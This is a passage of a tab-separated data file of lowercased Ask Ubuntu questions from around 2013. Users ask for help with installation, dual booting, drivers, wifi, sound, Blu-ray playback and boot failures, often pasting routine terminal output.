325606	battery indicator is blank	novice - installed ubuntu lts on acer laptop but the battery status does not appear to 'know ' anything about my battery . laptop charges fine etc but no info available ?
325612	bluray drive not responding when inserting a disk	problem : i am trying to play a bluray disk on my sony vaio laptop running ubuntu 12.04.2 . i have tried many tutorials on how to do this and actually i was able to play 1 scene once . but after reboot it stopped working again . what i have tried : i did try anything suggested in this question and also tried to manually mount the disk . both failed . i can run some termina command when no blu-ray is in the drive : $ wodim -- devices wodim : overview of accessible drives ( 1 found ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'pioneer ' 'bd-rw bdr-td04' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - $ sudo lshw -c disk *-cdrom description : dvd-ram writer product : bd-rw bdr-td04 vendor : pioneer physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc a dmesg | tail returns me many of these error blocks when a disk is inserted : [ 2172.584143 ] sr 4:0:0:0 : [ sr0 ] unhandled sense code [ 2172.584158 ] sr 4:0:0:0 : [ sr0 ] [ 2172.584160 ] result : hostbyte=did_ok driverbyte=driver_sense [ 2172.584161 ] sr 4:0:0:0 : [ sr0 ] [ 2172.584162 ] sense key : medium error [ current ] [ 2172.584164 ] info fld=0x0 [ 2172.584165 ] sr 4:0:0:0 : [ sr0 ] [ 2172.584167 ] add . sense : l-ec uncorrectable error [ 2172.584168 ] sr 4:0:0:0 : [ sr0 ] cdb : [ 2172.584169 ] read ( 10 ) : 28 00 00 00 00 00 00 00 02 00 [ 2172.584173 ] end_request : i/o error , dev sr0 , sector 0 [ 2172.584176 ] buffer i/o error on device sr0 , logical block 0 i found more on this issue in an archlinux and opensuse forum but both questions did not help me . without a disk in the drive all a dmesg | grep sr0 returns is : [ 1.345366 ] sr0 : scsi3-mmc drive : 62x/62x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.345556 ] sr 4:0:0:0 : attached scsi cd-rom sr0 libdvdcss is installed . so are libbluray1 , libbluray-dbg and libaacs0 . i also used this guied to patch my keydb.cfg and my libaacs0.so i also tried the lxbdplayer without success . question i 've read that this problem might be the result of a broken drive or a broken disk . the disk is brand new and should be fine ( i also checked it for scratches etc . ) and since the drive successfully plays audio-cds and dvds i do n't see how the drive can be broken . is there anything you can suggest me to try . any guide or tutorial you know about how to run bluray on ubuntu that i might have not tried yet ? if you need further information feel free to ask . edit : i just tried another bluray disk with the following result : running dmesg |grep sr0 returns still similar results : $ dmesg |grep sr0 [ 1.345366 ] sr0 : scsi3-mmc drive : 62x/62x writer dvd-ram cd/rw xa/form2 cdda tray [ 1.345556 ] sr 4:0:0:0 : attached scsi cd-rom sr0 [ 7593.402746 ] sr 4:0:0:0 : [ sr0 ] unhandled sense code [ 7593.402761 ] sr 4:0:0:0 : [ sr0 ] [ 7593.402764 ] sr 4:0:0:0 : [ sr0 ] [ 7593.402768 ] sr 4:0:0:0 : [ sr0 ] [ 7593.402771 ] sr 4:0:0:0 : [ sr0 ] cdb : [ 7593.402776 ] end_request : i/o error , dev sr0 , sector 1024 [ 7593.402779 ] buffer i/o error on device sr0 , logical block 128 [ 7607.672659 ] sr 4:0:0:0 : [ sr0 ] unhandled sense code [ 7607.672663 ] sr 4:0:0:0 : [ sr0 ] [ 7607.672666 ] sr 4:0:0:0 : [ sr0 ] [ 7607.672670 ] sr 4:0:0:0 : [ sr0 ] [ 7607.672674 ] sr 4:0:0:0 : [ sr0 ] cdb : [ 7607.672679 ] end_request : i/o error , dev sr0 , sector 1280 [ 7607.672695 ] udf-fs : error ( device sr0 ) : udf_read_tagged : read failed , block=320 , location=0 [ 7607.672699 ] udf-fs : warning ( device sr0 ) : udf_fill_super : no fileset found the drive is now responding to e.g . lshw -c disk *-cdrom description : dvd-ram writer product : bd-rw bdr-td04 vendor : pioneer physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=ready *-medium physical id : 0 logical name : /dev/cdrom i wonder why the name is /dev/cdrom and not /dev/dvd ? when i try to open the disk with vlc the following error pops up in the vlc console : blu-ray error : path does n't appear to be a bluray your input ca n't be opened : vlc is unable to open the mrl 'bluray : ///dev/cdrom ' . check the log for details .
325613	can i install wubi ubuntu 12.04 in a partition ( d : ) other than windows partition ( c : ) ?	i want to install ubuntu 12.04 lts using wubi . i already have windows xp in my system . i want to add ubuntu ( wubi ) for dual boot . my system is like this : windows ( c : ) 19 gb ( free=2gb ) drive 2 ( d : ) 19 gb ( free=19gb ) > > i want to install wubi ubuntu here . drive 3 ( e : ) 17 gb ( free=10gb ) drive 4 ( f : ) 17 gb ( free=10gb ) my only concern is if i choose installation drive as d : instead of c : , then will i still be able to boot into windows ? also if i use wubi , will my bootloader get overwritten ? also , does an install using wubi cause an ubuntu environment that requires more system resources than usual ?
325623	lxpanel volume control not visible plus no sound	i installed lubuntu on my laptop , and it is working extremely well . however , i can not figure out how to add applets to the panel . in particular , i can not add volume control , so i can not figure out how to change my volume ( which is currently muted ) . also , my function keys no longer work ( which is not surprising ) . how can i make it so that i have control over the volume using the panel applet and my function keys ? thanks for any replies . update : after testing this out with other applets , i found the problem is that volume control is not visible . how can i make it visible ? update : i played with alsamixer and found i have no sound . how can i fix this ? update : here is the output of pulseaudio e : [ pulseaudio ] module-alsa-card.c : failed to find a working profile . e : [ pulseaudio ] module.c : failed to load module `` module-alsa-card '' ( argument : `` device_id= '' 29 '' name= '' platform-thinkpad_acpi '' card_name= '' alsa_card.platform-thinkpad_acpi '' namereg_fail=false tsched=yes fixed_latency_range=no ignore_db=no deferred_volume=yes use_ucm=no card_properties= '' module-udev-detect.discovered=1 '' '' ) : initialization failed .
325624	windows xp not working from dual-boot menu	i have installed ubuntu desktop 13.04 alongside windows xp . at boot up , i get a option for windows but , when i select it , it simply goes back to the same menu . the partitions and files seem to still be in place . what do i need to do to get xp back ? please bear in mind i know virtually nothing about ubuntu , so saying things like sudo the grub-dongle wo n't mean anything to me : ) thanks
325626	half-installed ttf-mscorefonts-installer	13.04 raring ringtail - 64 bit how do i repair or remove the package so that i can install netflix on my laptop ? i get this error message from apt-get dpkg : error processing ttf-mscorefonts-installer ( -- configure ) : package ttf-mscorefonts-installer is not ready for configuration can not configure ( current status `half-installed ' )
325628	triple-boot windows 7/ubuntu 12.04/opensuse/ 12.2	i own a toshiba qosmio f60-11h , with features listed here http : //www.toshiba.it/discontinued-products/qosmio-f60-11h/ to which i add that the card integrated dvb-t is produced by yuan high tech-although reported as toshiba . i would like to install on the same computer windows 7 hp 64bit by default , ubuntu 12.04 and opensuse 12.2 , with the help of super grub . i would like to have or know of a guide indication to proceed with this triple-boot system , keeping in mind that opensuse , rpm distro to my liking in kde , has the characteristic of being a bit 'pushy and that , therefore , the ignition phase , when offers a choice of os to boot , it appears as if it were present in several versions but even if it is always the same . thanks
325630	should i uninstall the softwares which ubuntu has already in it ?	i am a lover of open source and i really want to install ubuntu . but i afraid of something : when i was looking for the features of ubuntu i saw that ubuntu is including some programs like mozilla and libreoffice . but i already installed these programs to my windows xp os . so , if i install ubuntu , then , will these programs re-install themselves ? should i uninstall these programs before installing ubuntu ? thanks advance !
325635	how to enable proprietary software source in ubuntu 13.04	how to enable proprietary software source in ubuntu 13.04 after installation of ubuntu 13.04.. please tell me
325637	gtksourceview in glade and c++	i try to develop a text editor in c++ and gtkmm using glade but i have a problem . when i try to run the program , i have the following message : '' buildererror : invalid object type `gtksourceview ' '' . i supose this error come from the glade file but i 'm not sure ! this is a part of the glade file : < object class= '' gtksourceview '' id= '' text '' > < property name= '' visible '' > true < /property > < property name= '' can_focus '' > true < /property > < property name= '' left_margin '' > 2 < /property > < property name= '' right_margin '' > 2 < /property > < property name= '' show_line_numbers '' > true < /property > < property name= '' show_line_marks '' > true < /property > < property name= '' tab_width '' > 4 < /property > < property name= '' auto_indent '' > true < /property > < /object > and here is how i declared the source buffer and the sourceview : glib : :refptr < gsv : :buffer > textbuffer ; gsv : :view *textview ; also , i must say that i use gtkmm 3.0 , gtksourceview3.0 and glade3.8.0
325643	what should i upload for submitting a proprietary app to usc ?	i have an app ready to be submitted to ubuntu software center . it is open-source and the source code is in github . but i want to submit it under proprietary license ( $ 0.0 however ) as i would not have to package it then . there will be link to the source code in the about menu of the app though . i want to know if i can just upload the source code or would i have to make .dsc .changes , .orig.tar.gz etc .
325644	reset wireless keyboard shortcut	i would like to define a keyboard shortcut that resets my wireless adapter . i know it is possible in the terminal with sudo ifconfig , but for the keyboard shortcut , i ca n't provide the password for sudo . are there other commands that can do the job without root privileges ?
325649	should i use complete partition for a wubi install ?	i have a completely free partition of 19.5 gb ( windows is installed in another partition . ) when i start wubi , it suggests that i use about 12 gb for ubuntu . the question is : should i go with wubi 's suggestion or should i use the maximum possible that wubi is allowing me ( 19 gb ) ? also wubi is n't letting me set a custom size ( like 13.8 gb for example ) . is there a way around it ?
325651	how do i get a lexmark t630 printer working ?	i have a lexmark t630 . this is a big toner printer . i could not find the ppd file for this printer because the website that used to have it , no longer works . i was just wondering what the correct generic print driver would be for this printer . the current on i put prints correctly but then after a while it 'll only print random text .
325652	how to fix ubuntu not working with a kvm	i have an older machine that i wanted to install ubuntu on as a `` toy '' machine . it originally had windows vista which worked just fine with my kvm . in fact , the old machine is one of three i have on the kvm . all work fine . all of the installs listed below were replacement installs ... ie ... ubuntu was the only operating system on the machine . initially , i attemped to install 12.04 and kept getting a message that ubuntu could not successfully detect my monitor , vid card , keyboard mouse . the install did continue . after the install completed , the same message popped up when starting from the hard drive and desktop did not start ... just command line linux . ok ... i installed 11.04 and during hard drive boot the screen would just go black . next i tried 13.04 and got the message again during install . so ... i skipped the kvm and connected the monitor directly to the machine ... bingo ... 13.04 installed fine and a reboot from the hard drive and everything seemed just peachy . ok ... acid test ... the kvm was reconnected and a reboot from the hard drive attempted . the screen goes black , i can hear the ubuntu drums , and the monitor simply remains black . since the kvm worked just fine with windows ... i have no reason to believe its a hardware problem . any ideas out there ? ( and obviously i am a rube with linux and ubuntu ) thanks in advance for any advice .
325654	unity global menu integration missing for some programs	first of all i 'm using ubuntu 13.04 and i do n't remember this problem has ever been produced by the previous releases . unity global menu integration is missing not for all the applications but some of them . here it is the programs that ca n't integrate with unity global menu : software center gedit geany terminal archive manager brasero adobe reader document viewer filezilla ... some programs can still integrate their menus with the global menu , such as firefox and file manager . i want the global menu integration back . thanks in advance .
325662	how to install ubuntu on windows 7 pc ?	i am trying to install ubuntu on my pc but it does n't show the boot window . when i started my pc and went in the disc clicked on wubi , it showed demo and full installation . i clicked on that . then , there were 3 options . i clicked on help boot from cd but it started installing something and then showed an error : could not retrieve the installation files so i cancelled that . what should i do ? how do i install ubuntu on my windows 7 pc ?
325663	thunderbird display messages on top	how do i make thunderbird display newly received messages at the top of the inbox instead of the bottom ?
325665	broke 12.04 trying to get 1366x768 resolutiion after upgrading from 10.04	i have been using ubuntu since 5.04 lts . i recently upgraded from 10.04 to 12.04 . i am using a vizio 20 '' hd tv as my monitor connected with vga cable to an evga nvidia fx6200 video card . after upgrading to 12.04 i could only get resolution of 1280x1024 . i tried various tips in ubuntu forums but none of them worked . as a last resort i tried the experimental drivers , which did n't make any difference . i uninstalled and went back to nvidia-current drivers and rebooted the system . now , i can only boot into tty1 and when type startx i get the following error message : nvidia api mismatch . the nvidia kernel module has version 304.48 , but this nvidia driver component has version 304.88 . please make sure the kernal module and all nvidia driver components have the same version . how can i correct problem ? thanks in advance for any help .
325669	how to detect missing dependencies for an executable ?	looking at http : //askubuntu.com/a/207750/23678 how did the author know which dependency was missing ? is there a generic way to look up the list of dependencies of an executables and which ones are missing ? update : i just noticed that noticed that http : //stackoverflow.com/a/9082947/14731 used readelf -l [ executable ] is this the best approach ?
325676	how to solve `` duplicated calibre icon '' issue ?	i have installed calibre using ubuntu software centre on ubuntu gnome 13.04 . then , i knew that there is newer version at calibre 's website , so i installed the newer version following the site 's instruction . everything is ok except that i have two calibre icons . how to solve it ?
325683	how to mount my linux partition in windows 8 ?	i am not being able to access the partition which is used by ubuntu . in fact i do n't know how to mount that partition from windows 8 . hope folks may help me .
325684	can not boot into ubuntu ( 12.04 ) after putting sapphire 7770 oc on my pc	i have the following problem : i have 2 hard disks on my pc . my first disk is a 500 gb hd and i have got ubuntu 12.04 installed a long time now . my second disk is a 2tb disk in which i just installed windows 7 x64 . everything was just fine , but 3 days ago i installed sapphire hd 7770 ghz edition oc 1gb gddr5 in my system . grub menu ( which i tweaked through this post : i ca n't get grub menu to show up during boot ) after the installation of the new graphics card boots normally into windows but it will not boot under any circumnstances on my ubuntu 12.04 ( 'check signal cable message ' ) . i even tried with a live cd it just went to black screen again 5 seconds after it had started . i have got some serious projects on my ubuntu since it is the primary os that i am using so a little help would be much appreciated . my system : asus motherboard 2 hard drives just i mentioned , my new graphics card sapphire hd 7770 ghz edition oc 1gb gddr5 , ram : 2 x 4 gb , processor : amd a4 3400 cpu with embedded graphics card ( that i am not using anymore ) . ps : note that it worked well up until 4 days ago , without the new graphics card . please help me if you can . thanks in advance .
325688	software center problems after upgrade to 13.04	when i try to start software-center i get this : 2013-07-28 17:05:22,922 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-07-28 17:05:26,357 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-07-28 17:05:26,375 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-07-28 17:05:26,414 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-07-28 17:05:26,414 - root - error - could not find any typelib for launchpadintegration ( software-center:26001 ) : ibus-warning ** : the owner of /home/entrio/.config/ibus/bus is not root ! 2013-07-28 17:05:27,386 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) it worked in the previous version 12.10 , but it always crashes at start now . i know that there are work arounds ( like synaptic ) . i 've already tried problem in upgrading and opening software center ok. solved the problem above , but now i get : 2013-07-28 18:10:47,442 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-07-28 18:10:47,740 - softwarecenter.region - warning - failed to use geoclue : 'org.freedesktop.geoclue.error.notavailable : geoclue master client has no usable address providers' 2013-07-28 18:10:48,058 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-07-28 18:10:48,062 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-07-28 18:10:48,069 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-07-28 18:10:48,069 - root - error - could not find any typelib for launchpadintegration 2013-07-28 18:10:48,130 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) segmentation fault ( core dumped ) bwt , i also get segmentation fault ( core dumped ) error messages when i try to start evolution . i purged it and re-installed . got these messages : get:1 http : //archive.ubuntu.com/ubuntu/ raring/main python-oneconf all 0.3.3 [ 21.8 kb ] get:2 http : //archive.ubuntu.com/ubuntu/ raring/main software-center all 5.6.0-0ubuntu2 [ 443 kb ] fetched 465 kb in 4s ( 112 kb/s ) selecting previously unselected package python-oneconf . ( reading database ... 420056 files and directories currently installed . ) unpacking python-oneconf ( from ... /python-oneconf_0.3.3_all.deb ) ... selecting previously unselected package software-center . unpacking software-center ( from ... /software-center_5.6.0-0ubuntu2_all.deb ) ... processing triggers for hicolor-icon-theme ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up python-oneconf ( 0.3.3 ) ... setting up software-center ( 5.6.0-0ubuntu2 ) ... updating software catalog ... this may take a moment . info : softwarecenter.db.pkginfo_impl.aptcache : aptcache.open ( ) warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic- visualiser : x-sonicvisualiser.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic- visualiser : x-sonicvisualiser-layer.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop /workrave : workrave.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application software catalog update was successful .
325690	how do i install bluetooth ?	how do i install bluetooth on my computer ? my camera has no facility for wire or cable transfer only bluetooth . thank you .
325696	system keeps restarting while installing ubuntu on lenovo g505s	i am trying to install ubuntu 12.04 64-bit on lenovo ( 59-380146 ) but the system gets restarting while installing . i do n't know what is the problem and i do n't know how to troubleshoot the problem as well , would appreciate if anyone can help me with it . below are the laptop specifications : processor processor apu quad core a10 variant 5750m chipset a76m brand amd clock speed 2.5 ghz with turbo core technology upto 3.5 ghz cache 4 mb memory expandable memory upto 16 gb memory slots 2 ( unused slot - 1 ) system memory 8 gb ddr3 storage rpm 5400 hdd capacity 1 tb display screen size 15.6 inch resolution 1366 x 768 pixel screen type hd display graphics dedicated graphics memory type gddr3 dedicated graphics memory capacity 2.5 gb graphic processor 512 mb amd radeon hd 8650g ( integrated ) and 2 gb ati sunpro hd 8570 graphics ( dedicated ) finally , i was able to install xubuntu 12.04 but whenever i start running any processor intensive tasks , it freezes the caps lock starts blinking and reboots . would appreciate if anyone could help me with this .
325697	backup all ubuntu 12.04 files	if i copy all files from ubuntu ( i guess that it is everything except media folder ? ) to another partition of my disk/another disk , would i be to restore ubuntu exactly as it was just by pasting everything ? ( i want to erase my disk , then install windows , then install ubuntu )
325699	how do i install whatpulse ?	i was expecting a .deb file but instead i got this : http : //whatpulse.org/downloads/50/64bit/
325705	protocol driver not attached ( hfs+ )	on a 12.04 lts system , i am attempting to mount an ssd that was formerly in a macbook pro . it has four partitions , one with a ubuntu install , one for swap , one a macintosh recovery partition , and the fourth is a os x install . both macintosh partitions are hfs+ . i have the drive in an external enclosure . when i plug it in , my machine auto-mounts all for partitions , but fails on `` macintosh hd '' ( the os x install partition ) saying , `` protocol driver not attached . '' i am able to mount and explore the recovery partition just fine , as well as the ubuntu and swap partitions . when attempting to mount via : ~ $ sudo mount -t hfsplus /dev/sdb2 /media/external i get the same results : ~ $ mount : protocol driver not attached
325706	diagnosing freezing/hanging	how can i diagnose random freezing on ubuntu ? i 've tried fresh reinstalls several times but the os still freezes often .
325708	wireless connection	since getting a linksys e900 router ubuntu 12.04 will not connect , same laptop ( dual boot ) windows 7 does connect , same laptop , different house ubuntu does connect . first router linksys e900 firmware 10.0.03 , second router linksys e1500 firmware 10.0.0 . wireless card is a broadcom and driver is installed . i 'm thinking there is something in the firmware upgrade that needs to be addressed in the network manager 's software . both router 's security is wpa2 personal . please help . 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) wl 2906597 0 cfg80211 178877 1 wl lib80211 14040 2 lib80211_crypt_tkip , wl lo no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . i ran the commands and rebooted and still no connection , see terminal output below : dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ sudo modprobe -r wl [ sudo ] password for dmcd : dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ sudo apt-get remove -- purge bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : bcmwl-kernel-source* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 3,656 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 170284 files and directories currently installed . ) removing bcmwl-kernel-source ... removing all dkms modules done . update-initramfs : deferring update ( trigger activated ) purging configuration files for bcmwl-kernel-source ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-49-generic dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ sudo modprobe brcsmac fatal : module brcsmac not found . dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ edit now i have a false connect , see terminal output below : nm-tool output : dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : wlan0 [ mccisco ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : brcmsmac state : connected default : no hw address : 00:26:82:99:44 : d3 capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) thomson5a1815 : infra , 00:24:17 : bc : e5:77 , freq 2462 mhz , rate 54 mb/s , strength 75 wpa mckay : infra , 00:18 : f8:3e : d5 : b6 , freq 2437 mhz , rate 54 mb/s , strength 45 wpa owner-pc_network : infra , 90 : f6:52 : c3:11:56 , freq 2412 mhz , rate 54 mb/s , strength 39 wpa wpa2 bell586 : infra , 2c : e4:12:90:59:79 , freq 2452 mhz , rate 54 mb/s , strength 39 wpa wpa2 belkinsp : infra , 00:17:3f:5a:5e:16 , freq 2462 mhz , rate 54 mb/s , strength 39 wpa bogdan : infra , 50:3d : e5:30 : a5:50 , freq 2437 mhz , rate 54 mb/s , strength 24 wpa2 galacticempire : infra , 28 : cf : da : b7:6e:4f , freq 2457 mhz , rate 54 mb/s , strength 30 wpa2 kalana : infra , 00:40 : f4 : e3 : d3:12 , freq 2412 mhz , rate 54 mb/s , strength 37 wep cancun1 : infra , 00:26:5a : c8 : e9:7d , freq 2437 mhz , rate 54 mb/s , strength 30 wep bell768 : infra , 00:26:50:9e:03:91 , freq 2462 mhz , rate 54 mb/s , strength 24 wep *mccisco : infra , c8 : d7:19 : cf:3f:7a , freq 2462 mhz , rate 54 mb/s , strength 58 wpa2 leano wireless : infra , 34 : ef:44:97 : cb : c1 , freq 2437 mhz , rate 54 mb/s , strength 19 wpa netgear-3g : infra , c4:3d : c7:6a : fa:3c , freq 2417 mhz , rate 54 mb/s , strength 17 wpa2 bell513 : infra , 3c : ea:4f : bc : ab:31 , freq 2437 mhz , rate 54 mb/s , strength 24 wep ipv6 settings : address : fd11 : cc97:526d:0:71e5:7a5d:3419 : d561 prefix : 64 gateway : : : address : fd11 : cc97:526d:0:226:82ff : fe99:44d3 prefix : 64 gateway : : : address : fe80 : :226:82ff : fe99:44d3 prefix : 64 gateway : : : - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : c8:0a : a9 : c8:17:65 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off route -n output : dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ route -n here are outputs from the nm-tool command while trying to connect and after failed connect : dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ nm-tool networkmanager tool state : connecting device : wlan0 [ mccisco ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : brcmsmac state : connecting ( getting ip configuration ) default : no hw address : 00:26:82:99:44 : d3 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points thomson5a1815 : infra , 00:24:17 : bc : e5:77 , freq 2462 mhz , rate 54 mb/s , strength 59 wpa mckay : infra , 00:18 : f8:3e : d5 : b6 , freq 2437 mhz , rate 54 mb/s , strength 42 wpa owner-pc_network : infra , 90 : f6:52 : c3:11:56 , freq 2412 mhz , rate 54 mb/s , strength 39 wpa wpa2 belkinsp : infra , 00:17:3f:5a:5e:16 , freq 2462 mhz , rate 54 mb/s , strength 39 wpa bell586 : infra , 2c : e4:12:90:59:79 , freq 2452 mhz , rate 54 mb/s , strength 37 wpa wpa2 galacticempire : infra , 28 : cf : da : b7:6e:4f , freq 2457 mhz , rate 54 mb/s , strength 30 wpa2 kalana : infra , 00:40 : f4 : e3 : d3:12 , freq 2412 mhz , rate 54 mb/s , strength 40 wep cancun1 : infra , 00:26:5a : c8 : e9:7d , freq 2437 mhz , rate 54 mb/s , strength 30 wep bell768 : infra , 00:26:50:9e:03:91 , freq 2462 mhz , rate 54 mb/s , strength 22 wep netgear-3g : infra , c4:3d : c7:6a : fa:3c , freq 2417 mhz , rate 54 mb/s , strength 27 wpa2 mccisco : infra , c8 : d7:19 : cf:3f:7a , freq 2462 mhz , rate 54 mb/s , strength 64 wpa2 device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : c8:0a : a9 : c8:17:65 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off dmcd @ dmcd-presario-cq62-notebook-pc : ~ $ nm-tool networkmanager tool state : disconnected device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : brcmsmac state : disconnected default : no hw address : 00:26:82:99:44 : d3 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points thomson5a1815 : infra , 00:24:17 : bc : e5:77 , freq 2462 mhz , rate 54 mb/s , strength 59 wpa mckay : infra , 00:18 : f8:3e : d5 : b6 , freq 2437 mhz , rate 54 mb/s , strength 42 wpa owner-pc_network : infra , 90 : f6:52 : c3:11:56 , freq 2412 mhz , rate 54 mb/s , strength 39 wpa wpa2 belkinsp : infra , 00:17:3f:5a:5e:16 , freq 2462 mhz , rate 54 mb/s , strength 39 wpa bell586 : infra , 2c : e4:12:90:59:79 , freq 2452 mhz , rate 54 mb/s , strength 37 wpa wpa2 galacticempire : infra , 28 : cf : da : b7:6e:4f , freq 2457 mhz , rate 54 mb/s , strength 30 wpa2 kalana : infra , 00:40 : f4 : e3 : d3:12 , freq 2412 mhz , rate 54 mb/s , strength 40 wep cancun1 : infra , 00:26:5a : c8 : e9:7d , freq 2437 mhz , rate 54 mb/s , strength 30 wep bell768 : infra , 00:26:50:9e:03:91 , freq 2462 mhz , rate 54 mb/s , strength 24 wep netgear-3g : infra , c4:3d : c7:6a : fa:3c , freq 2417 mhz , rate 54 mb/s , strength 27 wpa2 mccisco : infra , c8 : d7:19 : cf:3f:7a , freq 2462 mhz , rate 54 mb/s , strength 64 wpa2 device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : c8:0a : a9 : c8:17:65 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : off dmcd @ dmcd-presario-cq62-notebook-pc : ~ $
325709	error running a script : ? # ! /bin/csh : no such file or directory	i am trying to run the following script which will start a simulation run with a climate simulation program : # ! /bin/csh # run-script generated by most tue jul 23 13:10:46 2013 set exp=most # name your experiment here unset noclobber if ( $ 1 ! = `` '' ) cd $ 1 # rm -f plasim_restart cp most_rest.010 plasim_restart rm -f abort_message set year = 10 set years = 50 while ( $ year < $ years ) set year = `expr $ year + 1` set dataname=`printf ' % s. % 03d ' $ exp $ year` set diagname=`printf ' % s_diag. % 03d ' $ exp $ year` set restname=`printf ' % s_rest. % 03d ' $ exp $ year` ./most_plasim_t42_l10_p1.x > $ { diagname } if ( -e abort_message ) exit 1 if ( -e puma_output ) mv puma_output $ dataname if ( -e puma_diag ) mv puma_diag $ diagname cp plasim_status plasim_restart mv plasim_status $ restname end when i try to run it , i get the following error message : ./most_plasim_run : line 1 : ? # ! /bin/csh : no such file or directory ./most_plasim_run : line 5 : syntax error near unexpected token `cd ' ./most_plasim_run : line 5 : `if ( $ 1 ! = `` '' ) cd $ 1' i am mystified by this error message because i do in fact have bin/csh . i do n't know where the problem is .
325710	where to set up workspaces & 10.04 look & feel ?	unable to find setup for multiple workspaces . previous response to another question gives : '' system settings > appearance > behavior tab > enable workspaces '' but `` appearance '' is not even offered as an options . also want old 10.04 menu & task bar look & feel . this new default is way overboard for `` hide the system '' . please help ! thank you .
325711	ubuntu 13.04 purple screen of death and kernel panic	i 'm trying to install ubuntu 13.04 64-bit from a usb startup disc on a new ssd drive . the installation completes without a problem , but on the first boot i get a blank purple screen ( this is when i would expect the grub menu to appear , but it does n't ) . i have to reboot to get out of that , and then the grub menu does appear ( oddly in slow motion from bottom to top ) , and when i try to launch ubuntu ( first choice ) , i get the following message : kernel panic -- not syncing : no init found . try passing init= option to kernel i 've verified that the disc has no errors with badblocks : badblocks -v -n -s /dev/sda and got no errors reported . i 've tried the installation four or five times with different variation of options ( download updates , encryption , 3rd party software ) but always get the same outcome . i always let the ubuntu installation do full disc partitioning because i was n't sure how to so it myself properly -- it 's not a dual boot . i tried both 'ata ' and 'ahci ' serial ata modes in the bios . i have an nvidia-based gpu ( i 've 